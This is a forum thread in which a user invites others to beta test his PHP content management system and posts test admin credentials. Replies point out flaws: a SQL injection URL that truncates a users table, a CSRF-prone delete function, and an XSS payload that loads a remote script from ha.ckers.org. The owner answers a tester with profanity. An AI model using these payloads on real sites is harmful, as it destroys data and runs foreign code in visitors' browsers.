Jump to content

[SOLVED] Beta Test My CMS Please :D

R4nk3d

By R4nk3d
in Beta Test Your Stuff!

 Share

Recommended Posts

R4nk3d Member

R4nk3d

Posted
Posted

hey guys. i just made a content management system this week and for me, its pretty decent. Can you please check it out, tell me if there are any errors in it, etc. Things i should maybe change. Thanks!

 

The site is: http://www.parkerandsonsservices.com.

It is a website i am making for my dad's company.

I am wanting suggestions on the scripting, not designing please. I know im terribad at designing.

Go to http://www.parkerandsonsservices.com/admin/ to access the admin panel.

Username: test

Password: test

Please keep everything clean. And dont spam anything, or delete the already made pages that i have created which include:

Home, Services, Testimonials, Photos, Quotes, Contact.

 

Thanks :D

Link to comment
https://forums.phpfreaks.com/topic/129885-solved-beta-test-my-cms-please-d/
Share on other sites
GKWelding Newbie

GKWelding

Posted
Posted

where you have index.php?id=1 or 2 or 3 etc... You need to make sure that if that value is passed to a MySQL query, which I'm sure it will be, that in the MySQL query the numeric value is quoted with single quotes and that the value is checked to be an integer. If it isn't then even if you use mysql_real_escape_string I could still be able to pass commands such as index.php?id=;%20TRUNCATE%20TABLE users%20-- which would bypass the real_escape_string as there are no illegal characters in it, and it would empty your users table etc...

R4nk3d Member

R4nk3d

Posted
  • Author
Posted

The deletion functionality is vulnerable to CSRF attacks. You can solve this using a token and validating it on the deletion request. See: http://www.phpfreaks.com/tutorial/php-security/page8

Ok thanks. and thanks a ton for the link. that really helped.

 

 

thanks to all of u for helping me on security cause thats definatly a weakness for me.

dropfaith Advanced Member

dropfaith

Posted
Posted

xss attacks

 

http://www.parkerandsonsservices.com/index.php?id=27 is the one i just did just a pop up that says xss

 

in fact i can directly ad this

 

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 

ps that script is just an xss pop up that says your site doesnt block xss

R4nk3d Member

R4nk3d

Posted
  • Author
Posted

xss attacks

 

http://www.parkerandsonsservices.com/index.php?id=27 is the one i just did just a pop up that says xss

 

in fact i can directly ad this

 

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 

ps that script is just an xss pop up that says your site doesnt block xss

dont fucking delete my homepage u cunt

waynew Advanced Member

waynew

Posted
Posted

xss attacks

 

http://www.parkerandsonsservices.com/index.php?id=27 is the one i just did just a pop up that says xss

 

in fact i can directly ad this

 

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 

ps that script is just an xss pop up that says your site doesnt block xss

dont fucking delete my homepage u cunt

 

 

LOLOLOLOLOLOLOLOLOLOLOL

 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.